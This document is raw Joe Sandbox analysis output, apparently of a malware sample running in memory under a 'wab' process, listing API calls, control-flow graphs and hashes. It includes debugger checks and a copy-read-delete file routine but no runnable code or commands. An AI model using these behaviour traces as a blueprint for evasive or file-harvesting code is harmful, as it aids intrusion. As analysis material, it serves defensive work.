                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2152742572-0
                                                                                                                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                          • Instruction ID: aefcd109c19cd45f3223765dce8b6e9ec7e7f9240f028727f5a4816266403f0c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F02284D453703CFA1146B49CC3AFA5FEC8A672A8B181A16E040C7182C8D0A536C3F2
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 140 33e1571e-33e15727 141 33e15756-33e15757 140->141 142 33e15729-33e1573c RtlFreeHeap 140->142 142->141 143 33e1573e-33e15755 call 33e16368 GetLastError call 33e162ef 142->143 143->141
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,33E1924F,?,00000000,?,00000000,?,33E19276,?,00000007,?,?,33E17E5A,?), ref: 33E15734
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,33E1924F,?,00000000,?,00000000,?,33E19276,?,00000007,?,?,33E17E5A,?,?), ref: 33E15746
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                          • Opcode ID: ba99a1db3056afc2a04f4bfeaafb4d1e2c02310cc206cde44f4d6dd6ca6d2b2b
                                                                                                                                                                                                                          • Instruction ID: dac45bae618dd23f55337e2ce780494b803ea5a26a40fbfdf50c40a9e856f679
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba99a1db3056afc2a04f4bfeaafb4d1e2c02310cc206cde44f4d6dd6ca6d2b2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59E08672D10314ABD7102FA0E808B993BEAAB44694F500024F61CA6590D6349561C744
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 33E161DA
                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 33E161E4
                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 33E161F1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                          • String ID: }p[/
                                                                                                                                                                                                                          • API String ID: 3906539128-3413948691
                                                                                                                                                                                                                          • Opcode ID: bf7a7eb028620a520f950bbd67b76e91048c11b97cc500cdaa109d3cdc437df6
                                                                                                                                                                                                                          • Instruction ID: 3b8fd02027a402256b6894903d7c25f95e0211573262c9c697b068f0b424f8d6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf7a7eb028620a520f950bbd67b76e91048c11b97cc500cdaa109d3cdc437df6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A31B2B5D1122C9BCB21DF64D988B9DBBB8AF08310F5041EAE81CA7260E7349B958F45
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 33E12645
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 33E12710
                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 33E12730
                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 33E1273A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                          • Opcode ID: c15f1170d94a1d055c31a1a2c498ea006819cd52515b7c35b9cc79b7e6697327
                                                                                                                                                                                                                          • Instruction ID: 933887400751e64d15b2e388e823750fb2ee936ea7146161e8f4f817a92bf920
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c15f1170d94a1d055c31a1a2c498ea006819cd52515b7c35b9cc79b7e6697327
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF3127B5D5531C9BDB11DFA4CD89BCEBBF8AF08304F1040AAE50CAB250EB719A858F45
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 33E12276
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 33E12285
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 33E1228E
                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 33E1229B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                          • Opcode ID: 32162823d6530d5a58ea2afbab5623b8c31fc99eef58b6f628f93ce19ddec866
                                                                                                                                                                                                                          • Instruction ID: 71e292446c3abf084753d28741b200064bc0077b5de5f8defd7e107a5bbefff8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32162823d6530d5a58ea2afbab5623b8c31fc99eef58b6f628f93ce19ddec866
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67F04D71C10219EBCB01EFF4C549BAEBBF8EF18205F5144959412F6140E778AB069B51
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,33E12C3B,33E1D1DC,00000017), ref: 33E12B21
                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(33E1D1DC,?,33E12C3B,33E1D1DC,00000017), ref: 33E12B2A
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409,?,33E12C3B,33E1D1DC,00000017), ref: 33E12B35
                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,33E12C3B,33E1D1DC,00000017), ref: 33E12B3C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3231755760-0
                                                                                                                                                                                                                          • Opcode ID: f0cafbe4d9c9f88544a83ea640a396ffc2c869e110d440f4f64cabd1d407e4ce
                                                                                                                                                                                                                          • Instruction ID: 7f2f5ab0389a18b0be65bfde0b07dd2ae07af0fabf2a9cfb184c89b0c3dddd8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0cafbe4d9c9f88544a83ea640a396ffc2c869e110d440f4f64cabd1d407e4ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27D012B2804228ABCB003FE0CD0CBBB3FAAEB0C212F010000FB0AE2040CB358403DB61
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: .$}p[/
                                                                                                                                                                                                                          • API String ID: 0-2266384222
                                                                                                                                                                                                                          • Opcode ID: c21b4dbfe48bca827c9db83e097495336e375153cc3f401bd3a95cdbdd1806f8
                                                                                                                                                                                                                          • Instruction ID: f8b1dabd63e8546bd01e58d871c516ac89ea95401e7872c380c08a022d8a736e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c21b4dbfe48bca827c9db83e097495336e375153cc3f401bd3a95cdbdd1806f8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E63136B6D1020DAFDB148F78CC84EEB7BBDDB85348F0402ACED19D7255E6319A558B60
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,33E14A8A,?,33E22238,0000000C,33E14BBD,00000000,00000000,00000001,33E12082,33E22108,0000000C,33E11F3A,?), ref: 33E14AD5
                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,33E14A8A,?,33E22238,0000000C,33E14BBD,00000000,00000000,00000001,33E12082,33E22108,0000000C,33E11F3A,?), ref: 33E14ADC
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 33E14AEE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                          • Opcode ID: 6e1086aecd0b4f123ad0db744c14c20ab52bf1b2cc844619e74339b949562ba4
                                                                                                                                                                                                                          • Instruction ID: 2b2f547f1899240baa3d6fc776de6f6715622edb31c04f6029c9e1335454dc29
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e1086aecd0b4f123ad0db744c14c20ab52bf1b2cc844619e74339b949562ba4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BE0B636810218AFCF017FA4CD09B9A3BBAEF44385B514014F915AB661DB35D9A3DB54
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 33E1294C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                          • Opcode ID: 2215ba8c94fb138092821ab443c9e9c6c23bc9c0f25feb0b939d83deccdd366a
                                                                                                                                                                                                                          • Instruction ID: b06ac9c9f7e009dad3cbfa5827a9021756ba91d99208a5d3d3f3559885c58849
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2215ba8c94fb138092821ab443c9e9c6c23bc9c0f25feb0b939d83deccdd366a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C4199B1D012148BEB24EF68C98179EBBF4FB08714F28856AD845FB384D3309A51CFA0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                          • Opcode ID: 8aad46ad4a736724601bfdc543142bbd66f3ea17fe2d5f34be1234863a3093a0
                                                                                                                                                                                                                          • Instruction ID: 2dd075c227681762e20abe2cb9f6b760be7fd5344c4ced516ce2d691161ae3f6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8aad46ad4a736724601bfdc543142bbd66f3ea17fe2d5f34be1234863a3093a0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CA01130A002228FA300AE30C20A38E3AEFBB08A803020028A808E0000EB2080028B00
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 33E11D1B
                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 33E11D37
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33E11D4B
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33E11D58
                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33E11D72
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33E11D7D
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33E11D8A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1454806937-0
                                                                                                                                                                                                                          • Opcode ID: c7fe1abf1e5f5f05e6b07d27576d1a0b25d31cdec58b84f97377f6c7f067c225
                                                                                                                                                                                                                          • Instruction ID: 88c124cdd99cfcf2efbd1f0a1063804309e9374bccab468f8e878d772babac66
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7fe1abf1e5f5f05e6b07d27576d1a0b25d31cdec58b84f97377f6c7f067c225
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3621E9B5D4122CAEEB10AFA0CC8CFEB77FCEB09255F0409A5F515E2140DA749E868B74
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 252 33e19492-33e194ef GetConsoleCP 253 33e19632-33e19644 call 33e12ada 252->253 254 33e194f5-33e19511 252->254 256 33e19513-33e1952a 254->256 257 33e1952c-33e1953d call 33e17c19 254->257 260 33e19566-33e19575 call 33e179e6 256->260 263 33e19563-33e19565 257->263 264 33e1953f-33e19542 257->264 260->253 268 33e1957b-33e1959b WideCharToMultiByte 260->268 263->260 266 33e19609-33e19628 264->266 267 33e19548-33e1955a call 33e179e6 264->267 266->253 267->253 274 33e19560-33e19561 267->274 268->253 270 33e195a1-33e195b7 WriteFile 268->270 272 33e195b9-33e195ca 270->272 273 33e1962a-33e19630 GetLastError 270->273 272->253 275 33e195cc-33e195d0 272->275 273->253 274->268 276 33e195d2-33e195f0 WriteFile 275->276 277 33e195fe-33e19601 275->277 276->273 278 33e195f2-33e195f6 276->278 277->254 279 33e19607 277->279 278->253 280 33e195f8-33e195fb 278->280 279->253 280->277
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32 ref: 33E194D4
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 33E19590
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 33E195AF
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 33E195E8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                                                          • String ID: }p[/
                                                                                                                                                                                                                          • API String ID: 977765425-3413948691
                                                                                                                                                                                                                          • Opcode ID: 5e3bbd2044ca675b52cab4b9eef447671991043896d6ef2a4aac606a925c7879
                                                                                                                                                                                                                          • Instruction ID: a43764dec81cb55aa6deb09d547b2c293018d0b6b0c6e9ed06086ab1d6c33c8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e3bbd2044ca675b52cab4b9eef447671991043896d6ef2a4aac606a925c7879
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 655192B5E00209AFDB00CFA8D895AEEBBF9FF09310F14415AF556F7281D6309A51CBA0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 281 33e139be-33e139c8 282 33e13a6e-33e13a71 281->282 283 33e13a77 282->283 284 33e139cd-33e139dd 282->284 287 33e13a79-33e13a7d 283->287 285 33e139ea-33e13a03 LoadLibraryExW 284->285 286 33e139df-33e139e2 284->286 290 33e13a55-33e13a5e 285->290 291 33e13a05-33e13a0e GetLastError 285->291 288 33e139e8 286->288 289 33e13a6b 286->289 293 33e13a67-33e13a69 288->293 289->282 292 33e13a60-33e13a61 FreeLibrary 290->292 290->293 294 33e13a10-33e13a22 call 33e155f6 291->294 295 33e13a45 291->295 292->293 293->289 297 33e13a7e-33e13a80 293->297 294->295 301 33e13a24-33e13a36 call 33e155f6 294->301 296 33e13a47-33e13a49 295->296 296->290 299 33e13a4b-33e13a53 296->299 297->287 299->289 301->295 304 33e13a38-33e13a43 LoadLibraryExW 301->304 304->296
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                          • API String ID: 0-537541572
                                                                                                                                                                                                                          • Opcode ID: 11e7544069f5fa9df53456b71a81d7ccbeddaed2458cc20efbbae17b1539c6af
                                                                                                                                                                                                                          • Instruction ID: 614cf6f252f0ed9e12528a49e1a40e2483291148f88a6b1e0c0083cf5add9fca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11e7544069f5fa9df53456b71a81d7ccbeddaed2458cc20efbbae17b1539c6af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC1187B6E01725FBE7119B79CC84B5B37689F05BA4F180111E969B7280EB34D921C6E0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 305 33e14b39-33e14b61 GetModuleHandleExW 306 33e14b63-33e14b76 GetProcAddress 305->306 307 33e14b86-33e14b8a 305->307 308 33e14b85 306->308 309 33e14b78-33e14b83 306->309 310 33e14b95-33e14ba2 call 33e12ada 307->310 311 33e14b8c-33e14b8f FreeLibrary 307->311 308->307 309->308 311->310
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,33E14AEA,?,?,33E14A8A,?,33E22238,0000000C,33E14BBD,00000000,00000000), ref: 33E14B59
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 33E14B6C
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,33E14AEA,?,?,33E14A8A,?,33E22238,0000000C,33E14BBD,00000000,00000000,00000001,33E12082), ref: 33E14B8F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll$}p[/
                                                                                                                                                                                                                          • API String ID: 4061214504-453771297
                                                                                                                                                                                                                          • Opcode ID: a7d566f606123fe58165a12a284b62396956c83a35c9912f62f8594104c04fe4
                                                                                                                                                                                                                          • Instruction ID: 939db76c41051acb47b178b8fadebdda957d170c80a084c67bd8aeb419eaf6e9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7d566f606123fe58165a12a284b62396956c83a35c9912f62f8594104c04fe4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF03175D00128AFDB11AF90C808FAF7FB9EF08655F404154E805A6251DB309992CB50
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 33E11038
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 33E1104B
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 33E11061
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 33E11075
                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 33E11090
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 33E110B8
                                                                                                                                                                                                                          Memory Dump Source
